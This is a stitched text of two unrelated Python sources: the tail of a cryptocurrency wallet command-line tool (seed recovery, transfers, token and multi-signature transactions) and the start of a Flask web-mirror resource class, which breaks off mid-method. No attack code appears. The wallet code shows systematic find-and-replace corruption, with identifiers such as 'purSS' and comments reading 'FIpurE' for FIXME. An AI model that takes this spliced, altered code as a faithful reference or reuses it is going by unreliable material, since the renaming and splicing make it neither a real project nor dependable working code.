        secret = click.prompt('The wallet is encrypted. Enter password', hide_input=True)
        wallet.decrypt(secret)
    wallet.add_new_address(height, hash_function)
    _print_addresses(ctx, wallet.address_items, config.user.wallet_dir)
    if wallet_was_encrypted:
        wallet.encrypt(secret)
    wallet.save()
@pur.command()
@click.option('--seed-type', type=click.Choice(['hexseed', 'mnemonic']), default='hexseed')
@click.pass_context
def wallet_recover(ctx, seed_type):
    """
    Recovers a wallet from a hexseed or mnemonic (34 words)
    """
    # BUG FIX: the help text said "(32 words)", but the validation below
    # (and the error messages) require exactly 34 words.
    seed = click.prompt('Please enter your %s' % (seed_type,))
    seed = seed.lower().strip()
    if seed_type == 'mnemonic':
        words = seed.split()
        if len(words) != 34:
            print('You have entered %s words' % (len(words),))
            print('Mnemonic seed must contain only 34 words')
            return
        bin_seed = mnemonic2bin(seed)
    else:
        if len(seed) != 102:
            print('You have entered hexseed of %s characters' % (len(seed),))
            print('Hexseed must be of only 102 characters.')
            return
        bin_seed = hstr2bin(seed)
    wallet = Wallet(wallet_path=ctx.obj.wallet_path)
    recovered_purss = purSS.from_extended_seed(bin_seed)
    print('Recovered Wallet Address : %s' % (Wallet._get_Qaddress(recovered_purss.address),))
    # Refuse to add a duplicate address to the wallet.
    for addr in wallet.address_items:
        if recovered_purss.qaddress == addr.qaddress:
            print('Wallet Address is already in the wallet list')
            return
    if click.confirm('Do you want to save the recovered wallet?'):
        click.echo('Saving...')
        wallet.append_purss(recovered_purss)
        wallet.save()
        click.echo('Done')
        _print_addresses(ctx, wallet.address_items, config.user.wallet_dir)
@pur.command()
@click.option('--wallet-idx', default=1, prompt=True)
@click.pass_context
def wallet_secret(ctx, wallet_idx):
    """
    Provides the mnemonic/hexseed of the given address index
    """
    # WARNING: prints recovery secrets to the terminal.
    wallet = Wallet(wallet_path=ctx.obj.wallet_path)
    if wallet.encrypted:
        secret = click.prompt('The wallet is encrypted. Enter password', hide_input=True)
        wallet.decrypt(secret)
    address_item = get_item_from_wallet(wallet, wallet_idx)
    if address_item:
        click.echo('Wallet Address : {}'.format(address_item.qaddress))
        click.echo('Mnemonic : {}'.format(address_item.mnemonic))
        click.echo('Hexseed : {}'.format(address_item.hexseed))
@pur.command()
@click.option('--wallet-idx', type=int, prompt=True, help='index of address in wallet')
@click.option('--skip-confirmation', default=False, is_flag=True, prompt=False, help='skip the confirmation prompt')
@click.pass_context
def wallet_rm(ctx, wallet_idx, skip_confirmation):
    """
    Removes an address from the wallet using the given address index.
    Warning! Use with caution. Removing an address from the wallet
    will result in loss of access to the address and is not
    reversible unless you have address recovery information.
    Use the wallet_secret command for obtaining the recovery Mnemonic/Hexseed and
    the wallet_recover command for restoring an address.
    """
    wallet = Wallet(wallet_path=ctx.obj.wallet_path)
    address_item = get_item_from_wallet(wallet, wallet_idx)
    if address_item:
        if not skip_confirmation:
            click.echo(
                'You are about to remove address [{0}]: {1} from the wallet.'.format(wallet_idx, address_item.qaddress))
            click.echo(
                'Warning! By continuing, you risk complete loss of access to this address if you do not have a '
                'recovery Mnemonic/Hexseed.')
            # abort=True raises click.Abort (exits) when the user declines.
            click.confirm('Do you want to continue?', abort=True)
        wallet.remove(address_item.qaddress)
    _print_addresses(ctx, wallet.address_items, config.user.wallet_dir)
@pur.command()
@click.pass_context
def wallet_encrypt(ctx):
    # Encrypt the on-disk wallet with an AES passphrase (asked for twice).
    wallet = Wallet(wallet_path=ctx.obj.wallet_path)
    click.echo('Encrypting wallet at {}'.format(wallet.wallet_path))
    secret = click.prompt('Enter password', hide_input=True, confirmation_prompt=True)
    wallet.encrypt(secret)
    wallet.save()
@pur.command()
@click.pass_context
def wallet_decrypt(ctx):
    # Decrypt the on-disk wallet and save it back in the clear.
    wallet = Wallet(wallet_path=ctx.obj.wallet_path)
    click.echo('Decrypting wallet at {}'.format(wallet.wallet_path))
    secret = click.prompt('Enter password', hide_input=True)
    # NOTE(review): both handlers below are identical; the dedicated
    # WalletDecryptionError branch adds nothing over the generic one.
    try:
        wallet.decrypt(secret)
    except WalletDecryptionError as e:
        click.echo(str(e))
        quit(1)
    except Exception as e:
        click.echo(str(e))
        quit(1)
    try:
        wallet.save()
    except Exception as e:
        click.echo(str(e))
        quit(1)
@pur.command()
@click.option('--txblob', type=str, default='', prompt=True, help='transaction blob')
@click.pass_context
def tx_inspect(ctx, txblob):
    """
    Inspects a transaction blob
    """
    # Decode: hex blob -> protobuf -> Transaction wrapper. The dead
    # `tx = None` pre-assignment was removed (quit(1) exits on failure).
    try:
        txbin = parse_hexblob(txblob)
        pbdata = pur_pb2.Transaction()
        pbdata.ParseFromString(txbin)
        tx = Transaction.from_pbdata(pbdata)
    except Exception:
        click.echo("tx blob is not valid")
        quit(1)
    tmp_json = tx.to_json()
    # FIpurE: binary fields are represented in base64. Improve output
    print(tmp_json)
@pur.command()
@click.option('--txblob', type=str, default='', help='transaction blob (signed)')
@click.pass_context
def tx_push(ctx, txblob):
    """
    Sends a signed transaction blob to a node
    """
    # BUG FIX: the option help said "(unsigned)", but the command rejects
    # blobs without a signature below — it expects a signed blob.
    try:
        txbin = parse_hexblob(txblob)
        pbdata = pur_pb2.Transaction()
        pbdata.ParseFromString(txbin)
        tx = Transaction.from_pbdata(pbdata)
    except Exception:
        click.echo("tx blob is not valid")
        quit(1)
    tmp_json = tx.to_json()
    # FIpurE: binary fields are represented in base64. Improve output
    print(tmp_json)
    if len(tx.signature) == 0:
        click.echo('Signature missing')
        quit(1)
    # Forward the signed transaction to the node's public API.
    stub = ctx.obj.get_stub_public_api()
    pushTransactionReq = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
    pushTransactionResp = stub.PushTransaction(pushTransactionReq, timeout=CONNECTION_TIMEOUT)
    print(pushTransactionResp.error_code)
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='signer pur address')
@click.option('--master', type=str, default='', prompt=True, help='master pur address')
@click.option('--addr_to', type=str, default='', prompt=True, help='pur Address receiving this message (optional)')
@click.option('--message', type=str, prompt=True, help='Message (max 80 bytes)')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee in Quanta')
@click.option('--ots_key_index', default=1, prompt=True, help='OTS key Index (1..purSS num signatures)')
@click.pass_context
def tx_message(ctx, src, master, addr_to, message, fee, ots_key_index):
    """
    Message Transaction
    """
    # Phase 1: resolve the signer and validate/convert all inputs.
    try:
        _, src_purss = _select_wallet(ctx, src)
        if not src_purss:
            click.echo("A local wallet is required to sign the transaction")
            quit(1)
        address_src_pk = src_purss.pk
        ots_key_index = validate_ots_index(ots_key_index, src_purss)
        src_purss.set_ots_index(ots_key_index)
        message = message.encode()
        addr_to = parse_qaddress(addr_to, False)
        master_addr = None
        if master:
            master_addr = parse_qaddress(master)
        fee_shor = _quanta_to_shor(fee)
    except Exception as e:
        click.echo("Error validating arguments: {}".format(e))
        quit(1)
    # Phase 2: build, sign and push the transaction.
    try:
        stub = ctx.obj.get_stub_public_api()
        tx = MessageTransaction.create(message_hash=message,
                                       addr_to=addr_to,
                                       fee=fee_shor,
                                       purss_pk=address_src_pk,
                                       master_addr=master_addr)
        tx.sign(src_purss)
        push_transaction_req = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
        push_transaction_resp = stub.PushTransaction(push_transaction_req, timeout=CONNECTION_TIMEOUT)
        print(push_transaction_resp)
    except Exception as e:
        print("Error {}".format(str(e)))
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='source pur address')
@click.option('--master', type=str, default='', prompt=True, help='master pur address')
@click.option('--threshold', default=0, prompt=True, help='Threshold')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee in Quanta')
@click.option('--ots_key_index', default=1, prompt=True, help='OTS key Index (1..purSS num signatures)')
@click.pass_context
def tx_multi_sig_create(ctx, src, master, threshold, fee, ots_key_index):
    """
    Creates Multi Sig Create Transaction, that results into the formation of new multi_sig_address if accepted.
    """
    signatories = []
    weights = []
    # Interactively collect signatory addresses and their weights until a
    # blank address is entered.
    while True:
        address = click.prompt('Address of Signatory ', default='')
        if address == '':
            break
        weight = int(click.prompt('Weight '))
        signatories.append(parse_qaddress(address))
        weights.append(weight)
    # Resolve the signer and validate/convert all inputs.
    try:
        _, src_purss = _select_wallet(ctx, src)
        if not src_purss:
            click.echo("A local wallet is required to sign the transaction")
            quit(1)
        address_src_pk = src_purss.pk
        ots_key_index = validate_ots_index(ots_key_index, src_purss)
        src_purss.set_ots_index(ots_key_index)
        master_addr = None
        if master:
            master_addr = parse_qaddress(master)
        # FIpurE: This could be problematic. Check
        fee_shor = _quanta_to_shor(fee)
    except KeyboardInterrupt:
        click.echo("Terminated by user")
        quit(1)
    except Exception as e:
        click.echo("Error validating arguments: {}".format(e))
        quit(1)
    # Build, sign and push; the multi-sig address is derived from the
    # transaction hash.
    try:
        stub = ctx.obj.get_stub_public_api()
        tx = MultiSigCreate.create(signatories=signatories,
                                   weights=weights,
                                   threshold=threshold,
                                   fee=fee_shor,
                                   purss_pk=address_src_pk,
                                   master_addr=master_addr)
        tx.sign(src_purss)
        push_transaction_req = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
        push_transaction_resp = stub.PushTransaction(push_transaction_req, timeout=CONNECTION_TIMEOUT)
        print(push_transaction_resp.error_code)
        print('Multi sig Address Q{}'.format(bin2hstr(MultiSigAddressState.generate_multi_sig_address(tx.txhash))))
    except Exception as e:
        print("Error {}".format(str(e)))
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='signer pur address')
@click.option('--master', type=str, default='', help='master pur address')
@click.option('--multi_sig_address', type=str, default='', prompt=True, help='signer Multi Sig Address')
@click.option('--dsts', type=str, prompt=True, help='List of destination addresses')
@click.option('--amounts', type=str, prompt=True, help='List of amounts to transfer (Quanta)')
@click.option('--expiry_block_number', type=int, prompt=True, help='Expiry Blocknumber')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee in Quanta')
@click.option('--ots_key_index', default=1, help='OTS key Index (1..purSS num signatures)')
@click.pass_context
def tx_multi_sig_spend(ctx, src, master, multi_sig_address, dsts, amounts, expiry_block_number, fee, ots_key_index):
    """
    Transfer coins from src to dsts
    """
    address_src_pk = None
    master_addr = None
    addresses_dst = []
    shor_amounts = []
    # NOTE(review): odd initializer — fee_shor is an int after conversion;
    # the empty list is only a placeholder.
    fee_shor = []
    signing_object = None
    try:
        # Retrieve signing object
        selected_wallet = _select_wallet(ctx, src)
        if selected_wallet is None or len(selected_wallet) != 2:
            click.echo("A wallet was not found")
            quit(1)
        _, src_purss = selected_wallet
        if not src_purss:
            click.echo("A local wallet is required to sign the transaction")
            quit(1)
        address_src_pk = src_purss.pk
        ots_key_index = validate_ots_index(ots_key_index, src_purss)
        src_purss.set_ots_index(ots_key_index)
        signing_object = src_purss
        # Get and validate other inputs
        if master:
            master_addr = parse_qaddress(master)
        addresses_dst, shor_amounts = _parse_dsts_amounts(dsts, amounts, check_multi_sig_address=True)
        fee_shor = _quanta_to_shor(fee)
    except Exception as e:
        click.echo("Error validating arguments: {}".format(e))
        quit(1)
    # Strip the leading 'Q' and decode the multi-sig address to bytes.
    multi_sig_address = bytes(hstr2bin(multi_sig_address[1:]))
    try:
        # MultiSigSpend transaction
        tx = MultiSigSpend.create(multi_sig_address=multi_sig_address,
                                  addrs_to=addresses_dst,
                                  amounts=shor_amounts,
                                  expiry_block_number=expiry_block_number,
                                  fee=fee_shor,
                                  purss_pk=address_src_pk,
                                  master_addr=master_addr)
        # Sign transaction
        tx.sign(signing_object)
        if not tx.validate():
            print("It was not possible to validate the signature")
            quit(1)
        print("\nTransaction Blob (signed): \n")
        txblob = tx.pbdata.SerializeToString()
        txblobhex = hexlify(txblob).decode()
        print(txblobhex)
        # Push transaction
        print()
        print("Sending to a pur Node...")
        stub = ctx.obj.get_stub_public_api()
        push_transaction_req = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
        push_transaction_resp = stub.PushTransaction(push_transaction_req, timeout=CONNECTION_TIMEOUT)
        # Print result
        print(push_transaction_resp)
    except Exception as e:
        print("Error {}".format(str(e)))
def base64tohex(data):
    """Convert a base64 string to its hex representation (returned as bytes)."""
    return hexlify(a2b_base64(data))

def tx_unbase64(tx_json_str):
    """Re-encode the base64 binary fields of a transfer-tx JSON dump as hex.

    BUG FIX: hexlify() returns bytes, which the stdlib json encoder refuses
    to serialize (simplejson only tolerated them via its py2-compat path);
    decode each field to str before dumping so the output is stable either
    way.
    """
    tx_json = json.loads(tx_json_str)
    tx_json["publicKey"] = base64tohex(tx_json["publicKey"]).decode()
    tx_json["signature"] = base64tohex(tx_json["signature"]).decode()
    tx_json["transactionHash"] = base64tohex(tx_json["transactionHash"]).decode()
    tx_json["transfer"]["addrsTo"] = [base64tohex(v).decode() for v in tx_json["transfer"]["addrsTo"]]
    return json.dumps(tx_json, indent=True, sort_keys=True)
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='signer pur address')
@click.option('--master', type=str, default='', help='master pur address')
@click.option('--dsts', type=str, prompt=True, help='List of destination addresses')
@click.option('--amounts', type=str, prompt=True, help='List of amounts to transfer (Quanta)')
@click.option('--message_data', type=str, prompt=True, help='Message (Optional)')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee in Quanta')
@click.option('--ots_key_index', default=1, help='OTS key Index (1..purSS num signatures)')
@click.pass_context
def tx_transfer(ctx, src, master, dsts, amounts, message_data, fee, ots_key_index):
    """
    Transfer coins from src to dsts
    """
    address_src_pk = None
    master_addr = None
    addresses_dst = []
    shor_amounts = []
    # NOTE(review): odd initializer — fee_shor is an int after conversion.
    fee_shor = []
    signing_object = None
    message_data = message_data.encode()
    try:
        # Retrieve signing object
        selected_wallet = _select_wallet(ctx, src)
        if selected_wallet is None or len(selected_wallet) != 2:
            click.echo("A wallet was not found")
            quit(1)
        _, src_purss = selected_wallet
        if not src_purss:
            click.echo("A local wallet is required to sign the transaction")
            quit(1)
        address_src_pk = src_purss.pk
        ots_key_index = validate_ots_index(ots_key_index, src_purss)
        src_purss.set_ots_index(ots_key_index)
        signing_object = src_purss
        # Get and validate other inputs
        if master:
            master_addr = parse_qaddress(master)
        addresses_dst, shor_amounts = _parse_dsts_amounts(dsts, amounts, check_multi_sig_address=True)
        fee_shor = _quanta_to_shor(fee)
    except Exception as e:
        click.echo("Error validating arguments: {}".format(e))
        quit(1)
    try:
        # Create transaction
        tx = TransferTransaction.create(addrs_to=addresses_dst,
                                        amounts=shor_amounts,
                                        message_data=message_data,
                                        fee=fee_shor,
                                        purss_pk=address_src_pk,
                                        master_addr=master_addr)
        # Sign transaction
        tx.sign(signing_object)
        # Print the transaction with binary fields re-encoded as hex.
        txjson = tx_unbase64(tx.to_json())
        print(txjson)
        if not tx.validate():
            print("It was not possible to validate the signature")
            quit(1)
        print("\nTransaction Blob (signed): \n")
        txblob = tx.pbdata.SerializeToString()
        txblobhex = hexlify(txblob).decode()
        print(txblobhex)
        # Push transaction
        print("Sending to a pur Node...")
        stub = ctx.obj.get_stub_public_api()
        push_transaction_req = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
        push_transaction_resp = stub.PushTransaction(push_transaction_req, timeout=CONNECTION_TIMEOUT)
        # Print result
        print(push_transaction_resp)
    except Exception as e:
        print("Error {}".format(str(e)))
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='source pur address')
@click.option('--master', type=str, default='', prompt=True, help='master pur address')
@click.option('--symbol', default='', prompt=True, help='Symbol Name')
@click.option('--name', default='', prompt=True, help='Token Name')
@click.option('--owner', default='', prompt=True, help='Owner pur address')
@click.option('--decimals', default=0, prompt=True, help='decimals')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee in Quanta')
@click.option('--ots_key_index', default=1, prompt=True, help='OTS key Index (1..purSS num signatures)')
@click.pass_context
def tx_token(ctx, src, master, symbol, name, owner, decimals, fee, ots_key_index):
    """
    Create Token Transaction, that results into the formation of new token if accepted.
    """
    initial_balances = []
    # More than 19 decimals would overflow the amount representation.
    if decimals > 19:
        click.echo("The number of decimal cannot exceed 19 under any possible configuration")
        quit(1)
    # Interactively collect the initial holder balances until a blank
    # address is entered; amounts are scaled into the smallest token unit.
    while True:
        address = click.prompt('Address ', default='')
        if address == '':
            break
        amount = int(click.prompt('Amount ')) * (10 ** int(decimals))
        initial_balances.append(pur_pb2.AddressAmount(address=parse_qaddress(address),
                                                      amount=amount))
    # Resolve the signer and validate/convert all inputs.
    try:
        _, src_purss = _select_wallet(ctx, src)
        if not src_purss:
            click.echo("A local wallet is required to sign the transaction")
            quit(1)
        address_src_pk = src_purss.pk
        ots_key_index = validate_ots_index(ots_key_index, src_purss)
        src_purss.set_ots_index(ots_key_index)
        address_owner = parse_qaddress(owner)
        master_addr = None
        if master:
            master_addr = parse_qaddress(master)
        # FIpurE: This could be problematic. Check
        fee_shor = _quanta_to_shor(fee)
        if len(name) > config.dev.max_token_name_length:
            raise Exception("Token name must be shorter than {} chars".format(config.dev.max_token_name_length))
        if len(symbol) > config.dev.max_token_symbol_length:
            raise Exception("Token symbol must be shorter than {} chars".format(config.dev.max_token_symbol_length))
    except KeyboardInterrupt:
        click.echo("Terminated by user")
        quit(1)
    except Exception as e:
        click.echo("Error validating arguments: {}".format(e))
        quit(1)
    # Build, sign and push the token-creation transaction.
    try:
        stub = ctx.obj.get_stub_public_api()
        tx = TokenTransaction.create(symbol=symbol.encode(),
                                     name=name.encode(),
                                     owner=address_owner,
                                     decimals=decimals,
                                     initial_balances=initial_balances,
                                     fee=fee_shor,
                                     purss_pk=address_src_pk,
                                     master_addr=master_addr)
        tx.sign(src_purss)
        push_transaction_req = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
        push_transaction_resp = stub.PushTransaction(push_transaction_req, timeout=CONNECTION_TIMEOUT)
        print(push_transaction_resp.error_code)
    except Exception as e:
        print("Error {}".format(str(e)))
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='source pur address')
@click.option('--master', type=str, default='', prompt=True, help='master pur address')
@click.option('--token_txhash', default='', prompt=True, help='Token Txhash')
@click.option('--dsts', type=str, prompt=True, help='List of destination addresses')
@click.option('--amounts', type=str, prompt=True, help='List of amounts to transfer (Quanta)')
@click.option('--decimals', default=0, prompt=True, help='decimals')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee in Quanta')
@click.option('--ots_key_index', default=1, prompt=True, help='OTS key Index (1..purSS num signatures)')
@click.pass_context
def tx_transfertoken(ctx, src, master, token_txhash, dsts, amounts, decimals, fee, ots_key_index):
    """
    Create Transfer Token Transaction, which moves tokens from src to dst.

    Validates addresses/amounts, signs with the selected local wallet, and
    pushes the transaction via the node's public API. Exits with status 1
    on validation errors.
    """
    # Token amounts are scaled by 10**decimals, so cap the exponent.
    if decimals > 19:
        click.echo("The number of decimal cannot exceed 19 under any configuration")
        quit(1)
    try:
        # Parse destinations/amounts and the token identifier.
        addresses_dst, shor_amounts = _parse_dsts_amounts(dsts, amounts, token_decimals=decimals)
        bin_token_txhash = parse_hexblob(token_txhash)
        master_addr = None
        if master:
            master_addr = parse_qaddress(master)
        # FIXME: This could be problematic. Check
        fee_shor = _quanta_to_shor(fee)
        # Resolve the signing wallet and its one-time-signature key slot.
        _, src_purss = _select_wallet(ctx, src)
        if not src_purss:
            click.echo("A local wallet is required to sign the transaction")
            quit(1)
        address_src_pk = src_purss.pk
        ots_key_index = validate_ots_index(ots_key_index, src_purss)
        src_purss.set_ots_index(ots_key_index)
    except KeyboardInterrupt:
        click.echo("Terminated by user")
        quit(1)
    except Exception as e:
        click.echo("Error validating arguments: {}".format(e))
        quit(1)
    try:
        # Build, sign and broadcast the transfer transaction.
        stub = ctx.obj.get_stub_public_api()
        tx = TransferTokenTransaction.create(token_txhash=bin_token_txhash,
                                             addrs_to=addresses_dst,
                                             amounts=shor_amounts,
                                             fee=fee_shor,
                                             purss_pk=address_src_pk,
                                             master_addr=master_addr)
        tx.sign(src_purss)
        push_transaction_req = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
        push_transaction_resp = stub.PushTransaction(push_transaction_req, timeout=CONNECTION_TIMEOUT)
        print(push_transaction_resp.error_code)
    except Exception as e:
        print("Error {}".format(str(e)))
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='source address or index')
@click.option('--master', type=str, default='', prompt=True, help='master pur address')
@click.option('--number_of_slaves', default=0, type=int, prompt=True, help='Number of slaves addresses')
@click.option('--access_type', default=0, type=int, prompt=True, help='0 - All Permission, 1 - Only Mining Permission')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee (Quanta)')
@click.option('--pk', default=0, prompt=False, help='public key (when local wallet is missing)')
@click.option('--ots_key_index', default=1, prompt=False, help='OTS index (when local wallet is missing)')
@click.pass_context
def slave_tx_generate(ctx, src, master, number_of_slaves, access_type, fee, pk, ots_key_index):
    """
    Generates Slave Transaction for the wallet

    Creates `number_of_slaves` fresh purSS trees, signs a SlaveTransaction
    delegating `access_type` to their public keys, and writes everything to
    slaves.json in the current directory.
    """
    try:
        _, src_purss = _select_wallet(ctx, src)
        # NOTE(review): validate_ots_index/set_ots_index are called before the
        # `if src_purss:` check below, so a missing local wallet would reach
        # them with a falsy value — confirm _select_wallet's contract here.
        ots_key_index = validate_ots_index(ots_key_index, src_purss)
        src_purss.set_ots_index(ots_key_index)
        if src_purss:
            address_src_pk = src_purss.pk
        else:
            # NOTE(review): --pk defaults to int 0, on which .encode() would
            # raise AttributeError; only a string public key works here.
            address_src_pk = pk.encode()
        master_addr = None
        if master:
            master_addr = parse_qaddress(master)
        fee_shor = _quanta_to_shor(fee)
    except Exception as e:
        click.echo("Error validating arguments: {}".format(e))
        quit(1)
    slave_purss = []
    slave_pks = []
    access_types = []
    slave_purss_seed = []
    # Hard limit on delegated slave keys per transaction.
    if number_of_slaves > 100:
        click.echo("Error: Max Limit for the number of slaves is 100")
        quit(1)
    # Generate one fresh purSS tree per slave; keep the seeds so the mining
    # node can re-derive the private keys from slaves.json.
    for i in range(number_of_slaves):
        print("Generating Slave #" + str(i + 1))
        purss = purSS.from_height(config.dev.purss_tree_height)
        slave_purss.append(purss)
        slave_purss_seed.append(purss.extended_seed)
        slave_pks.append(purss.pk)
        access_types.append(access_type)
        print("Successfully Generated Slave %s/%s" % (str(i + 1), number_of_slaves))
    try:
        tx = SlaveTransaction.create(slave_pks=slave_pks,
                                     access_types=access_types,
                                     fee=fee_shor,
                                     purss_pk=address_src_pk,
                                     master_addr=master_addr)
        tx.sign(src_purss)
        # slaves.json = [master address, slave seeds, signed tx] for the miner.
        with open('slaves.json', 'w') as f:
            json.dump([bin2hstr(src_purss.address), slave_purss_seed, tx.to_json()], f)
        click.echo('Successfully created slaves.json')
        click.echo('Move slaves.json file from current directory to the mining node inside ~/.pur/')
    except Exception as e:
        click.echo("Unhandled error: {}".format(str(e)))
        quit(1)
@pur.command()
@click.option('--owner', default='', prompt=True, help='source pur address')
@click.pass_context
def token_list(ctx, owner):
    """
    Fetch the list of tokens owned by an address.

    Prints hash, symbol, name and balance for every token held by `owner`,
    resolving each token's creation transaction via GetObject.
    """
    try:
        owner_address = parse_qaddress(owner)
    except Exception as e:
        click.echo("Error validating arguments: {}".format(e))
        quit(1)
    try:
        stub = ctx.obj.get_stub_public_api()
        address_state_req = pur_pb2.GetAddressStateReq(address=owner_address)
        address_state_resp = stub.GetAddressState(address_state_req, timeout=CONNECTION_TIMEOUT)
        # state.tokens maps token txhash (hex) -> balance held by this address.
        for token_hash in address_state_resp.state.tokens:
            get_object_req = pur_pb2.GetObjectReq(query=bytes(hstr2bin(token_hash)))
            get_object_resp = stub.GetObject(get_object_req, timeout=CONNECTION_TIMEOUT)
            click.echo('Hash: %s' % (token_hash,))
            click.echo('Symbol: %s' % (get_object_resp.transaction.tx.token.symbol.decode(),))
            click.echo('Name: %s' % (get_object_resp.transaction.tx.token.name.decode(),))
            click.echo('Balance: %s' % (address_state_resp.state.tokens[token_hash],))
    except Exception as e:
        print("Error {}".format(str(e)))
@pur.command()
@click.pass_context
def state(ctx):
    """
    Shows Information about a Node's State

    Prints the GetNodeState response, as JSON when --json output was
    requested on the CLI, otherwise as the protobuf text form.
    """
    stub = ctx.obj.get_stub_public_api()
    nodeStateResp = stub.GetNodeState(pur_pb2.GetNodeStateReq())
    if ctx.obj.output_json:
        click.echo(MessageToJson(nodeStateResp, sort_keys=True))
    else:
        click.echo(nodeStateResp)
def main():
    """CLI entry point: invoke the root click command group."""
    pur()

if __name__ == '__main__':
    main()
|
import datetime
import os.path
import contextlib
import logging
import random
import urllib.parse
import common.database
import Misc.txt_to_img
import WebMirror.Engine
# import WebMirror.runtime_engines
from common.Exceptions import DownloadException, getErrorDiv
from flask import g
from app import app
from app import utilities
import common.global_constants
import WebRequest
import WebRequest.UA_Constants as wr_constants
import common.util.DbCookieJar as dbCj
import common.database as db
def td_format(td_object):
    """
    Render a timedelta as a compact age string, e.g. "1h, 4m, 2s".

    Returns "just fetched" for durations under one second.
    """
    seconds = int(td_object.total_seconds())
    if seconds < 1:
        return "just fetched"
    periods = [
        ('y', 60 * 60 * 24 * 365),
        ('d', 60 * 60 * 24),
        ('h', 60 * 60),
        ('m', 60),
        ('s', 1),
    ]
    retstr = []
    for period_name, period_seconds in periods:
        # BUGFIX: use '>=' (was '>') so exact multiples render in the larger
        # unit: 60 seconds is "1m", not "60s".
        if seconds >= period_seconds:
            period_value, seconds = divmod(seconds, period_seconds)
            retstr.append("%s%s" % (period_value, period_name))
    return ", ".join(retstr)
# Small shared pool of fetchers, each with a database-backed cookie jar;
# RemoteContentObject picks one at random per archiver instance.
WG_POOL = [WebRequest.WebGetRobust(
    alt_cookiejar = dbCj.DatabaseCookieJar(db=db, session=db.get_db_session(postfix="_cookie_interface"))
    ) for x in range(2)]
class RemoteContentObject(object):
    """
    Wrapper around one remote URL: fetches it through a SiteArchiver and
    exposes the resulting job's title, content, resource file and cache age.

    Callers must invoke fetch() before the getters, and close() when done.
    """

    def __init__(self, url, db_session = None):
        self.log = logging.getLogger("Main.RemoteContentObject")
        self.url = url
        self.fetched = False
        self.job = None
        # Use the caller's DB session when given, else the per-request
        # flask session from `g`.
        if db_session:
            self.db_sess = db_session
        else:
            self.db_sess = g.session
        # print("RemoteContentObject instantiated. Available fetchers: %s" % WebMirror.runtime_engines.fetchers.qsize())
        # self.archiver = WebMirror.runtime_engines.fetchers.get()
        self.archiver = WebMirror.Engine.SiteArchiver(cookie_lock=False,
                new_job_queue=None,
                db_interface=self.db_sess,
                wg_override=random.choice(WG_POOL)
            )

    def fetch(self, ignore_cache=False, version=None):
        """Synchronously fetch the URL; optionally pin to an archived version."""
        # A specific archived version and a cache bypass are mutually exclusive.
        assert not (ignore_cache and version)
        self.job = self.archiver.synchronousJobRequest(self.url, ignore_cache)
        self.fetched = True
        # Override the job instance if we're fetching a old version
        if version != None:
            self.job = self.job.versions[version]

    def getTitle(self):
        """Return the fetched page's title (fetch() must have run)."""
        assert self.fetched
        assert self.job
        return self.job.title

    def getContent(self, relink_replace):
        """
        At this point, we have the page content, but we need to
        replace the url/resource keys with the proper paths
        so that the page will render properly
        """
        assert self.fetched
        content = self.job.content
        if content and relink_replace:
            content = utilities.replace_links(content)
        return content

    def getMime(self):
        """Return the fetched job's MIME type."""
        assert self.fetched
        assert self.job
        return self.job.mimetype

    def getResource(self):
        """
        Return (mimetype, filename, bytes) for the fetched resource.

        On any failure (incomplete job, missing file even after a refetch,
        missing file on disk) returns a generated PNG image describing the
        error instead of raising.
        """
        assert self.fetched
        if self.job.state != "complete":
            self.log.error("Job resource retreival attempted when job has not been completed!")
            self.log.error("Target URL %s", self.job.url)
            msg = "Job failed or not fetched!\n"
            msg += "Current job state: %s\n" % self.job.state
            msg += "URL: %s\n" % self.job.url
            img_dat = Misc.txt_to_img.text_to_png(msg)
            # NOTE(review): the '%s' in the filename is never interpolated —
            # the literal "genimg.%s.png" is returned. Confirm intended.
            return "image/png", "genimg.%s.png", img_dat

        # job failed
        if not self.job.file:
            # Job completed but no file was stored: try once more, bypassing
            # the cache.
            try:
                self.fetch(ignore_cache=True)
            except DownloadException:
                self.log.error("Failure during refetch-attempt for item!")
                self.log.error("Refetch attempt for %s", self.job.url)
                msg = "Job complete, but no file present?!\n"
                msg += "Current job state: %s\n" % self.job.state
                msg += "URL: %s\n" % self.job.url
                msg += "Returned MIME: %s\n" % self.job.mimetype
                msg += "Content size: %s\n" % len(self.job.content)
                # msg += "Body: %s\n" % self.job.content
                img_dat = Misc.txt_to_img.text_to_png(msg)
                return "image/png", "genimg.%s.png", img_dat

            if not self.job.file:
                self.log.error("Refetch for resource did not return content!")
                self.log.error("Target URL %s", self.job.url)
                msg = "Job complete, no file present, and refetch failed!\n"
                msg += "Current job state: %s\n" % self.job.state
                msg += "URL: %s\n" % self.job.url
                msg += "Returned MIME: %s\n" % self.job.mimetype
                msg += "Content size: %s\n" % len(self.job.content)
                # msg += "Body: %s\n" % self.job.content
                img_dat = Misc.txt_to_img.text_to_png(msg)
                return "image/png", "genimg.%s.png", img_dat

        assert self.fetched
        assert self.job.file

        # The file may live in either resource directory; try both.
        itempath = os.path.join(app.config['RESOURCE_DIR'], self.job.file_item.fspath)
        itempath2 = os.path.join(app.config['RESOURCE_DIR_2'], self.job.file_item.fspath)
        fname = self.job.file_item.filename
        self.db_sess.commit()
        if os.path.exists(itempath):
            with open(itempath, "rb") as fp:
                contents = fp.read()
        elif os.path.exists(itempath2):
            with open(itempath2, "rb") as fp:
                contents = fp.read()
        else:
            msg = "Failed to find file resource!\n"
            msg += "Current job state: %s\n" % self.job.state
            msg += "URL: %s\n" % self.job.url
            img_dat = Misc.txt_to_img.text_to_png(msg)
